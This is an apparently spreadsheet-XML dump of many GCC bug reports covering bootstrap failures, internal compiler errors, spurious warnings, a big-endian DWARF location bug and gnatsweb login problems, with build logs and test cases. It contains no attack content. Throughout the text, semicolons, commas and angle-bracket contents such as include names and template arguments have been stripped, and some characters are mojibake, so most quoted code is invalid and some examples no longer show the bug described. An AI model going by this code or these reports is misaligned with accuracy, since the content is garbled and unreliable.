../../../../gcc/libstdc++-v3/libmath/mathconf.h:205:7: #error We need INFINITE_P
gmake[4]: *** [signbit.lo] Error 1
gmake[4]: Leaving directory `/home/matthew/Uber/CVS/objdir/i586-sco-sysv5uw7.1.1/libstdc++-v3/libmath'
gmake[3]: *** [all-recursive] Error 1
gmake[3]: Leaving directory `/home/matthew/Uber/CVS/objdir/i586-sco-sysv5uw7.1.1/libstdc++-v3'
gmake[2]: *** [all-recursive-am] Error 2
gmake[2]: Leaving directory `/home/matthew/Uber/CVS/objdir/i586-sco-sysv5uw7.1.1/libstdc++-v3'
gmake[1]: *** [all-target-libstdc++-v3] Error 2
gmake[1]: Leaving directory `/home/matthew/Uber/CVS/objdir'
gmake: *** [bootstrap] Error 2
-----------------------------------------------------------------
Thank you for looking at this and I'd be glad to
provide more info if needed.
Matthew
Release:
gcc 2.97 cvs  [checked out 2/14]
Environment:
PATH=/sbin:/usr/sbin:/etc:/usr/bin:/usr/local/bin:/usr/ccs/bin:/usr/local/kde/bin:/usr/X/bin
LIBPATH=/usr/lib:/lib:/usr/local/lib:/usr/ccs/lib:/usr/local/BerkeleyDB/lib
LD_LIBRARY_PATH=/usr/lib:/lib:/usr/local/lib:/usr/ccs/lib:/usr/local/BerkeleyDB/lib
Using   gcc-2.95.2.1
        autconf-2.13
        binutils-2.10.1
        gnu-make-3.79.1
        no UDK (UnixWare Development Kit)
Attempting to build on UnixWare 7.1.1 which is an
i586-sco-sysv5uw7.1.1 HOST.
How-To-Repeat:
This was noted too in a post last year by Robert Lipe to
libstdc++@gcc.gnu.org that he has the same error.</t>
  </si>
  <si>
    <t>GCC-375</t>
  </si>
  <si>
    <t>GCC gnatsweb</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Mon 3 Jul 2000 13:17:12 +0100 (BST)
 Original-Message-ID: 
 Attempting to search the GCC gnatsweb
 (http://sourceware.cygnus.com/cgi-bin/gnatsweb.pl) I noticed a few
 problems:
 * The login page makes no mention of needing to have cookies
 enabled but without cookies enabled it just redirects to another login
 page (under Netscape) or goes to a Redirecting page which does nothing
 (under lynx).  The latter problem seems to be because it is trying to use
 an HTTP Refresh header which is not mentioned in RFC 2616 (the HTTP 1.1
 spec) and also applies even if cookies are accepted.
 * Under lynx -cookies after accepting two cookies lynx then gives an
 error Accept invalid cookie path=/cgi-bin/gnatsweb.pl as a prefix of
 '/cgi-bin'? (n).  If this is indeed invalid the gnatsweb should be
 fixed.
 * When using Netscape and accepting cookies it is possible to log in as
 guest but then searching for category c also shows up bugs in category
 c++.
 -- 
 Joseph S. Myers
 jsm28@cam.ac.uk
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-2567</t>
  </si>
  <si>
    <t>gcc: incorrect calling of template class destructor produces internal error</t>
  </si>
  <si>
    <t>gcc -Wall x.cpp prints this error message:
x.cpp: In function `void freeclass(class_1 *)':
x.cpp:20: Internal compiler error 980605.
x.cpp:20: Please submit a full bug report.
x.cpp:20: See  for instructions.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Linux Kernel 2.2.16 (SuSE Linux 7.0)
How-To-Repeat:
#include 
class class_1 {
  public:
    class_1(void) {}
    virtual ~class_1(void) {}
}
template class class_2 {
  public:
    class_2(void) {}
    virtual ~class_2(void) {}
}
void freeclass(class_1 *p)
{
  if (p) {
    // Internal compiler error 980605:
    p-&gt;~class_2()
    // correct:
    // p-&gt;~class_1()
    // correct error message:
    // p-&gt;~class_2()
    free(p)
  }
}
int main(void)
{
  class_1 v1
  class_2 v2
  // same error:
  // v1.~class_2()
  return(0)
}</t>
  </si>
  <si>
    <t>GCC-854</t>
  </si>
  <si>
    <t>internal compiler error.</t>
  </si>
  <si>
    <t>[csimon@saturnin clzdsi]$ g++  -v -save-temps -c -g  -DXXX_DBG -DCPE_MT -I/home/epeios/cvs/epeios/stable -I/home/csimon/cvs/eclz/stable -I/home/csimon/cvs/epgs/stable  clzdsi.cpp
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/specs
gcc version 2.95.2 19991024 (release)
GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /home/epeios/cvs/epeios/stable
 /home/csimon/cvs/eclz/stable
 /home/csimon/cvs/epgs/stable
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../i686-pc-linux-gnu/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/cc1plus clzdsi.ii -quiet -dumpbase clzdsi.cc -g -version -o clzdsi.s
GNU C++ version 2.95.2 19991024 (release) (i686-pc-linux-gnu) compiled by GNU C version 2.95.2 19991024 (release).
In file included from clzdsi.cpp:30:
clzdsi.h: In method `enum clzdsp::answer clzdsi::dispatcher_master_interface___::Dispatch(clzdsp::user_functions__ &amp; flw::oflow___ &amp; clzbrm::connections_ &amp;)':clzdsi.h:199: Internal compiler error 191.
clzdsi.h:199: Please submit a full bug report.
clzdsi.h:199: See  for instructions.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>claude.simon</t>
  </si>
  <si>
    <t>GCC-50349</t>
  </si>
  <si>
    <t>/usr/bin/ld: warning: wildcard match appears in both version 'GLIBCXX_3.4' and 'CXXABI_1.3' in script</t>
  </si>
  <si>
    <t>during native gcc-4.6 bootstrap the linker reports few warnings
on libstdc++-symbols.ver script:
(...)
/usr/bin/ld: warning: wildcard match appears in both version 'GLIBCXX_3.4' and 'CXXABI_1.3' in script
/usr/bin/ld: warning: using 'GLIBCXX_3.4' as version for 'std::basic_stringbuf std::allocator &gt;::str() const' which is also named in version 'GLIBCXX_3.4.6' in script
/usr/bin/ld: warning: using 'GLIBCXX_3.4' as version for 'std::basic_string std::allocator &gt;::_M_disjunct(char const*) const' which is also named in version 'GLIBCXX_3.4.5' in script
/usr/bin/ld: warning: using 'GLIBCXX_3.4' as version for 'std::basic_string std::allocator &gt;::_M_disjunct(wchar_t const*) const' which is also named in version 'GLIBCXX_3.4.5' in script</t>
  </si>
  <si>
    <t>GCC-71104</t>
  </si>
  <si>
    <t>[7 Regression] ICE: verify_ssa failed (with vfork /  error: definition in block 3 does not dominate use in block 7 )</t>
  </si>
  <si>
    <t>found this while cross compiling busybox to aarch64 i think it depends on vfork being special.
gcc version 7.0.0 20160512
(trunk r236177)
$ cat a.c
struct globals { int helper_pid }
extern struct globals *const ptr
void foo(int)
int vfork(void)
void bar(void)
{
 foo(0)
 (*ptr).helper_pid = ({ int pid = vfork() if (pid &lt; 0) foo(0) pid })
}
$ aarch64-none-linux-gnu-gcc -c a.c 
a.c: In function 'bar':
a.c:12:1: error: definition in block 3 does not dominate use in block 7
 }
 ^
for SSA_NAME: ptr.0_1 in statement:
# .MEM_12 = VDEF 
ptr.0_1-&gt;helper_pid = _11
a.c:12:1: internal compiler error: verify_ssa failed
0xd25da2 verify_ssa(bool bool)
	/w/src/gcc/gcc/tree-ssa.c:1039
0xa5be0d execute_function_todo
	/w/src/gcc/gcc/passes.c:1971
0xa5c77b execute_todo
	/w/src/gcc/gcc/passes.c:2016
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>nsz</t>
  </si>
  <si>
    <t>GCC-49275</t>
  </si>
  <si>
    <t>--enable-build-with-cxx profiledbootstrap BOOT_CFLAGS=-g -O3 CFLAGS_FOR_TARGET=-g -O3 CXXFLAGS_FOR_TARGET=-g -O3 failure</t>
  </si>
  <si>
    <t>At r174593 with http://gcc.gnu.org/ml/gcc-patches/2011-05/msg02301.html and
http://gcc.gnu.org/ml/gcc-patches/2011-05/msg00412.html applied the
profiledbootstrap BOOT_CFLAGS=-g -O3 CFLAGS_FOR_TARGET=-g -O3 CXXFLAGS_FOR_TARGET=-g -O3 using --enable-build-with-cxx fails with...
/sw/src/fink.build/gcc47-4.7.0-1000/darwin_objdir/./prev-gcc/g++ -B/sw/src/fink.build/gcc47-4.7.0-1000/darwin_objdir/./prev-gcc/ -B/sw/lib/gcc4.7/x86_64-apple-darwin11.0.0/bin/ -nostdinc++ -B/sw/src/fink.build/gcc47-4.7.0-1000/darwin_objdir/prev-x86_64-apple-darwin11.0.0/libstdc++-v3/src/.libs -I/sw/src/fink.build/gcc47-4.7.0-1000/darwin_objdir/prev-x86_64-apple-darwin11.0.0/libstdc++-v3/include/x86_64-apple-darwin11.0.0 -I/sw/src/fink.build/gcc47-4.7.0-1000/darwin_objdir/prev-x86_64-apple-darwin11.0.0/libstdc++-v3/include -I/sw/src/fink.build/gcc47-4.7.0-1000/gcc-4.7-20110602/libstdc++-v3/libsupc++ -L/sw/src/fink.build/gcc47-4.7.0-1000/darwin_objdir/prev-x86_64-apple-darwin11.0.0/libstdc++-v3/src/.libs -c  -g -O3 -flto=jobserver -frandom-seed=1 -fprofile-use -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.7-20110602/gcc -I../../gcc-4.7-20110602/gcc/. -I../../gcc-4.7-20110602/gcc/../include -I../../gcc-4.7-20110602/gcc/../libcpp/include -I/sw/include -I/sw/include  -I../../gcc-4.7-20110602/gcc/../libdecnumber -I../../gcc-4.7-20110602/gcc/../libdecnumber/dpd -I../libdecnumber -I/sw/include  -I/sw/include -DCLOOG_INT_GMP -DCLOOG_ORG -I/sw/include ../../gcc-4.7-20110602/gcc/reload1.c -o reload1.o
../../gcc-4.7-20110602/gcc/reload1.c: In function 'reload_reg_free_p(unsigned int int reload_type)':
../../gcc-4.7-20110602/gcc/reload1.c:9074:1: error: corrupted profile info: profile data is not flow-consistent
../../gcc-4.7-20110602/gcc/reload1.c:9074:1: error: corrupted profile info: number of executions for edge 65-85 thought to be -101
../../gcc-4.7-20110602/gcc/reload1.c:9074:1: error: corrupted profile info: number of executions for edge 65-66 thought to be 35201
make[3]: *** [reload1.o] Error 1
make[3]: *** Waiting for unfinished jobs....</t>
  </si>
  <si>
    <t>GCC-4802</t>
  </si>
  <si>
    <t>g++ accepts an illegal code containing templates.</t>
  </si>
  <si>
    <t>g++ accepts the following code but A::I is private.
Release:
3.0
Environment:
Linux</t>
  </si>
  <si>
    <t>m.duflot</t>
  </si>
  <si>
    <t>GCC-12318</t>
  </si>
  <si>
    <t>gnat bug when compiling generic units</t>
  </si>
  <si>
    <t>In 3.15p we have:
+===========================GNAT BUG DETECTED==============================+
| 3.15p  (20020523) (i686-pc-linux-gnu) Storage_Error stack overflow (or
erroneous memory access)|
| Error detected at sets.adb:1:1 [things.ads:5:4]                          |
| Please submit bug report by email to report@gnat.com.                    |
| Use a subject line meaningful to you and us to track the bug.            |
| (include your customer number #nnn in the subject line).                 |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
| (use plain ASCII or MIME attachment or FTP to your customer directory). |
| See README.GNATPRO for full info on procedure for submitting bugs.       |
+==========================================================================+
Please include these source files with error report
analysis.ads
Similar Problem occurs in 3.3.2:
+===========================GNAT BUG DETECTED==============================+
| 3.3.2 20030908 (Debian prerelease) (i486-pc-linux-gnu) Assert_Failure
sem_elab.adb:1410|
| Error detected at sets.adb:1:1 [things.ads:5:4]                          |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc-3.3 or gnatmake command that you entered.          |
| Also include sources listed below in gnatchop format                     |
| concatenated together with no headers between files.                     |
+==========================================================================+
Please include these source files with error report
analysis.ads
list may be incomplete
compilation abandoned
gnatmake: analysis.ads compilation error</t>
  </si>
  <si>
    <t>www.sd</t>
  </si>
  <si>
    <t>GCC-40007</t>
  </si>
  <si>
    <t>[4.5 regression] specialization causes access problem in primary template</t>
  </si>
  <si>
    <t>template            
  struct x                      
  {                             
  protected:
    typedef int type
  }
template
  struct y : public x
  {
    typedef x base_type
    typedef typename base_type::type type
  }
template
  struct y : public x
  {
    typedef x base_type
    typedef base_type::type type
  }
template class y
int main()
{
  return 0
}
$ g++4x spec.cc
spec.cc: In instantiation of â€˜yâ€™:
spec.cc:22:   instantiated from here
spec.cc:5: error: â€˜typedef int x::typeâ€™ is protected
spec.cc:10: error: within this context
$ g++4x -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.x/configure --prefix=/home/redi/gcc/4.x --with-system-zlib --enable-__cxa_atexit --with-arch=k8 --enable-libstdcxx-debug --disable-libstdcxx-pch --enable-languages=cc++ --enable-libstdcxx-time=yes --disable-bootstrap --enable-checking=release
Thread model: posix
gcc version 4.5.0 20090502 (experimental) (GCC)
If the base class is not a template there is no error if the y specialisation is not defined there is no error.  As I'm not using the y specialisation its contents should make no difference to the instantiation of y.
Looks like a regression since 4.3 as it works with gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) and Comeau's online compiler.</t>
  </si>
  <si>
    <t>GCC-7441</t>
  </si>
  <si>
    <t>[3.2 regression] string array initialization compilation time regression from seconds to minutes</t>
  </si>
  <si>
    <t>g++ frontend takes about 1m40s to compile the attached code
gcc frontend compile the same code in 2 seconds
gcc version 3.0.4 and 2.91 doesn't have the same problem
Release:
gcc version 3.2 2002-07-26 (prerelease)
Environment:
g++ -v -save-temps t.cxx
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
Configured with: ./configure --enable-threads --enable-languages=cc++
Thread model: posix
gcc version 3.2 2002-07-26 (prerelease)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ t.cxx t.ii
GNU CPP version 3.2 2002-07-26 (prerelease) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/c++/3.2
 /usr/local/include/c++/3.2/i686-pc-linux-gnu
 /usr/local/include/c++/3.2/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/cc1plus -fpreprocessed t.ii -quiet -dumpbase t.cxx -version -o t.s
GNU CPP version 3.2 2002-07-26 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2 2002-07-26 (prerelease) (i686-pc-linux-gnu)
        compiled by GNU C version 3.0.4.
 as --traditional-format -V -Qy -o t.o t.s
GNU assembler version 2.11.90.0.8 (i386-redhat-linux) using BFD version 2.11.90.0.8
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/crtbegin.o -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2 -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/../../.. t.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/crtend.o /usr/lib/crtn.o
How-To-Repeat:
g++ -c t.ii</t>
  </si>
  <si>
    <t>tsv</t>
  </si>
  <si>
    <t>GCC-28156</t>
  </si>
  <si>
    <t>spurious warning: function defined but not used</t>
  </si>
  <si>
    <t>Hi
$ cat try.cc
#include 
static void foo() {
    std::cout &lt;&lt; hello world\n
}
int main() {
    extern void foo()
    foo()
}
$ g++-4.1.0 -Wall try.cc
try.cc:3: warning: `void foo()' defined but not used
$ ./a.out
hello world
foo() is clearly used there so why does g++ warn about it?</t>
  </si>
  <si>
    <t>rwxr-xr-x</t>
  </si>
  <si>
    <t>GCC-13267</t>
  </si>
  <si>
    <t>Bad DWARF2 info is generated for char variable pushed to stack</t>
  </si>
  <si>
    <t xml:space="preserve">
While chasing a gdb testsuite failure for the sh-elf toolchain I
discovered a problem printing a local variable that appears to be a
generic gcc bug in how it generates DWARF info for the local variable.
I just tested the mips-elf toolchain and the bug also appears using
that toolchain.  It probably affects all toolchains that support a big
endian target.
Environment:
System: Linux fred.ninemoons.com 2.4.20-20.9 #1 Mon Aug 18 11:27:43 EDT 2003 i686 athlon i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: mips-unknown-elf
configured with: /src/sourceware/gcc/gcc/configure -v --prefix=/usr/local/sourceware --target=mips-elf --enable-multilib --with-gnu-as --with-gnu-ld --with-newlib --enable-languages=cc++
How-To-Repeat:
Consider the following code simplified from some scope tests in the
gdb testsuite:
  signed char bar (register signed char u)
  {
    return (u + 1)
  }
  signed char foo (register signed char u)
  {
    register signed char l = u
    l = bar (l)
    return (l)
  }
  main ()
  {
    foo (3)
  }
Note that:
  (1) the register declarations are required to expose the bug.  Without
  them the generated code and debug information is different and the
  problem goes away.
  (2) The example should be compiled without optimization.
  (3) The problem is masked if the target is little endian.  Toolchains
  such as sh-elf or mips-elf which are bi-endian help to demonstrate this.
Here is an example using the sh-elf toolchain in big endian mode.
Note that the value of 'l' after being assigned from 'u' and before
calling bar() is printed as 0 and should be 3 the same as 'u':
  $ sh-elf-gcc -g -m4 -mb -o b b.c
  $ sh-elf-gdb b
  GNU gdb 2003-11-29-cvs
  Copyright 2003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host=i686-pc-linux-gnu --target=sh-elf...
  (gdb) tar sim
  Connected to the simulator.
  (gdb) load
  Loading section .init size 0x36 vma 0x1000
  Loading section .text size 0x1900 vma 0x1040
  Loading section .fini size 0x2a vma 0x2940
  Loading section .rodata size 0x1e vma 0x296c
  Loading section .data size 0x798 vma 0x2a0c
  Loading section .eh_frame size 0x4 vma 0x31a4
  Loading section .ctors size 0x8 vma 0x31a8
  Loading section .dtors size 0x8 vma 0x31b0
  Loading section .jcr size 0x4 vma 0x31b8
  Loading section .got size 0xc vma 0x31bc
  Loading section .stack size 0x4 vma 0x30000
  Start address 0x1040
  Transfer rate: 68080 bits/sec.
  (gdb) br foo
  Breakpoint 1 at 0x1186: file b.c line 8.
  (gdb) run
  Starting program: /tmp/b 
  Breakpoint 1 foo (u=3 '\003') at b.c:8
  8         register signed char l = u
  (gdb) n
  10        l = bar (l)
  (gdb) p l
  $1 = 0 '\0'
  (gdb) 
If however we use little endian mode the value is printed correctly:
  $ sh-elf-gcc -g -m4 -ml -o b b.c
  $ sh-elf-gdb b
  GNU gdb 2003-11-29-cvs
  Copyright 2003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host=i686-pc-linux-gnu --target=sh-elf...
  (gdb) tar sim
  Connected to the simulator.
  (gdb) load
  Loading section .init size 0x36 vma 0x1000
  Loading section .text size 0x1900 vma 0x1040
  Loading section .fini size 0x2a vma 0x2940
  Loading section .rodata size 0x1e vma 0x296c
  Loading section .data size 0x798 vma 0x2a0c
  Loading section .eh_frame size 0x4 vma 0x31a4
  Loading section .ctors size 0x8 vma 0x31a8
  Loading section .dtors size 0x8 vma 0x31b0
  Loading section .jcr size 0x4 vma 0x31b8
  Loading section .got size 0xc vma 0x31bc
  Loading section .stack size 0x4 vma 0x30000
  Start address 0x1040
  Transfer rate: 68080 bits/sec.
  (gdb) br foo
  Breakpoint 1 at 0x1186: file b.c line 8.
  (gdb) run
  Starting program: /tmp/b 
  Breakpoint 1 foo (u=3 '\003') at b.c:8
  8         register signed char l = u
  (gdb) n
  10        l = bar (l)
  (gdb) p l
  $1 = 3 '\003'
  (gdb) 
The problem is that the live value of 'l' at the time we print it is
on the stack and the address computed from the dwarf information is
for the lowest address of the 4 byte stack slot that holds the
character value.  In the big endian case this is for the most
significant byte which is zero.  In the little endian case this is
for the least significant byte which is 3.
Note also that the dwarf info is identical for either endian:
  $ sh-elf-gcc -g -m4 -mb -c b.c
  $ dwarfdump -a b.o &gt;b.o.mb
  $ sh-elf-gcc -g -m4 -ml -c b.c
  $ dwarfdump -a b.o &gt;b.o.ml
  $ diff b.o.mb b.o.ml
The code is also identical except for a pseudo that indicates the
endianness:
  $ sh-elf-gcc -g -m4 -mb -S b.c
  $ mv b.s b.s.mb
  $ sh-elf-gcc -g -m4 -ml -S b.c
  $ mv b.s b.s.ml
  $ diff b.s.mb b.s.ml
  2a3
  &gt;       .little
  $ diff -c b.s.mb b.s.ml
  *** b.s.mb      2003-11-29 13:00:08.000000000 -0700
  --- b.s.ml      2003-11-29 13:00:16.000000000 -0700
  ***************
  *** 15 ****
  --- 16 ----
          .file   b.c
          .text
  +       .little
          .section        .debug_abbrev@progbits
    .Ldebug_abbrev0:
          .section        .debug_info@progbits
  $
For reference here are the relevant parts of the dwarfdump output:
        DW_TAG_base_type
                  DW_AT_name                  signed char
                  DW_AT_byte_size             1
                  DW_AT_encoding              DW_ATE_signed_char
        DW_TAG_variable
                  DW_AT_name                  l
                  DW_AT_decl_file             1 /tmp/b.c
                  DW_AT_decl_line             8
                  DW_AT_type                  
                  DW_AT_location              DW_OP_fbreg 0
My guess is that since gcc is generating the memory offset of a 1 byte
object relative to the frame pointer that the DW_AT_location for the
big endian case should be:
                  DW_AT_location              DW_OP_fbreg 3</t>
  </si>
  <si>
    <t>GCC-48393</t>
  </si>
  <si>
    <t>ICE: in omega_add_zero_geq at omega.h:274 with -fcheck-data-deps --param omega-max-geqs=0</t>
  </si>
  <si>
    <t>Created attachment 23840
reduced testcase (the same as gcc.dg/tree-ssa/pr42327.c)
Compiler output:
$ gcc -O -fcheck-data-deps --param omega-max-geqs=0 testcase.c 
testcase.c: In function 'foo':
testcase.c:1:6: internal compiler error: in omega_add_zero_geq at omega.h:274
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-54657</t>
  </si>
  <si>
    <t>darwin-c.c:278:27: error: invalid conversion from â€˜const char*â€™ to â€˜char*â€™</t>
  </si>
  <si>
    <t>g++ -c  -DIN_GCC_FRONTEND -DIN_GCC_FRONTEND -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -fno-exceptions -fno-rtti -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno
-common  -DHAVE_CONFIG_H -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    -I. -I. -I../../../gcc/gcc -I../../../gc
c/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include  -I../../../g
cc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber   \
        ../../../gcc/gcc/config/darwin-c.c -DGCC_INCLUDE_DIR=\/usr/local/lib/gcc/i686-apple-darwin10/4.8.0/include\ -DFIXED_INCLUDE_DIR=\/usr/local/lib/gcc/i686-apple-darwin10/4.8.0/include-fixed\ -DGPLUSPLUS_INCLUDE_DIR=\/usr/local/lib/gcc/i686-apple-darwin10/4.8.0/../../../../i686-apple-darwin10/include/c++/4.8.0\ -DGPLUSPLUS_INCLUDE_DIR_ADD_SYSROOT=0 -DGPLUSPLUS_TOOL_INCLUDE_DIR=\/usr/local/lib/gcc/i686-apple-darwin10/4.8.0/../../../../i686-apple-darwin10/include/c++/4.8.0/i686-apple-darwin10\ -DGPLUSPLUS_BACKWARD_INCLUDE_DIR=\/usr/local/lib/gcc/i686-apple-darwin10/4.8.0/../../../../i686-apple-darwin10/include/c++/4.8.0/backward\ -DLOCAL_INCLUDE_DIR=\/usr/local/include\ -DCROSS_INCLUDE_DIR=\/usr/local/lib/gcc/i686-apple-darwin10/4.8.0/../../../../i686-apple-darwin10/sys-include\ -DTOOL_INCLUDE_DIR=\/usr/local/lib/gcc/i686-apple-darwin10/4.8.0/../../../../i686-apple-darwin10/include\ -DNATIVE_SYSTEM_HEADER_DIR=\/usr/include\ -DPREFIX=\/usr/local/\ -DSTANDARD_EXEC_PREFIX=\/usr/local/lib/gcc/\ 
../../../gcc/gcc/config/darwin-c.c: In function â€˜char* framework_construct_pathname(const char* cpp_dir*)â€™:
../../../gcc/gcc/config/darwin-c.c:278:27: error: invalid conversion from â€˜const char*â€™ to â€˜char*â€™ [-fpermissive]
   buf = strchr (fname '/')
                           ^
../../../gcc/gcc/config/darwin-c.c: In function â€˜const char* find_subframework_file(const char* const char*)â€™:
../../../gcc/gcc/config/darwin-c.c:353:30: error: invalid conversion from â€˜const char*â€™ to â€˜char*â€™ [-fpermissive]
   bufptr = strchr (fname '/')
                              ^
../../../gcc/gcc/config/darwin-c.c:365:40: error: invalid conversion from â€˜const char*â€™ to â€˜char*â€™ [-fpermissive]
   bufptr = strstr (pname dot_framework)
                                        ^
make[2]: *** [darwin-c.o] Error 1
rm gcov.pod gcj-dbtool.pod jcf-dump.pod gcj.pod gcc.pod cpp.pod gccgo.pod fsf-funding.pod gij.pod gc-analyze.pod grmic.pod gfortran.pod jv-convert.pod gfdl.pod
make[2]: Leaving directory `/home/amylaar/fsf/multi/i686-apple-darwin10/gcc'
make[1]: *** [all-gcc] Error 2
make[1]: Leaving directory `/home/amylaar/fsf/multi/i686-apple-darwin10'
This error has been seen for the following configurations:
i686-apple-darwin    i686-apple-darwin9  powerpc-darwin7  x86_64-apple-darwin
i686-apple-darwin10  powerpc64-darwin    powerpc-darwin8</t>
  </si>
  <si>
    <t>GCC-2061</t>
  </si>
  <si>
    <t>g++-3 emits misleading warning</t>
  </si>
  <si>
    <t xml:space="preserve">The compilation of the source code tc.C emits a misleading warning.
g++ states that there is a parse error before `' token in line 11
but there is no semicolon in that line. In fact a std::-prefix is
missing as shown by the correct commented line.
Release:
3.0 20010221 (prerelease)
Environment:
System: Linux kiste 2.4.1 #33 Thu Feb 15 12:51:39 CET 2001 i686 unknown
Architecture: i686
SuSE 7.1
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix
How-To-Repeat:
source file tc.C
#include
template
class cv : public std::vector   
{
   public:
    typedef typename std::vector::iterator iterator
      cv() {}
      cv(iterator i iterator j)
      : vector(i j)
//      : std::vector(i j)          
      {}
}
int main()
{
    cv cv
}
Compilation of ts.C 
g++ -v -o tc tc.C -W -Wall -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix
gcc version 3.0 20010221 (prerelease)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=3 -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tc.C tc.ii
GNU CPP version 3.0 20010221 (prerelease) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/cc1plus -fpreprocessed tc.ii -quiet -dumpbase tc.C -W -Wall -version -o tc.s
GNU CPP version 3.0 20010221 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0 20010221 (prerelease) (i686-pc-linux-gnu)
 compiled by GNU C version 3.0 20010221 (prerelease).
tc.C: In constructor `cv::cv(typename std::vector 
   &gt;::iterator typename std::vector &gt;::iterator)':
tc.C:11: parse error before `' token
bzip2 compressed and uuencoded preprocessed source file tc.ii.bz2
See attachments for tc.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-6897</t>
  </si>
  <si>
    <t>Code produced with -fPIC reserves EBX but compiles bad __asm__ anyway</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #73065.
  Please CC 73065@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/73065 ]
According to the bug submitter both files should fail to compile with
the same warning. He has produced verifiably incorrect asm code using
the latter syntax. Rechecked with gcc-3.1.
intech20:/tmp$ cat foo.c
int
main(int argcchar * argv[]) {
  int i=0
  __asm__ __volatile__ (addl $1%%ebx\n\t : : b (i))
}
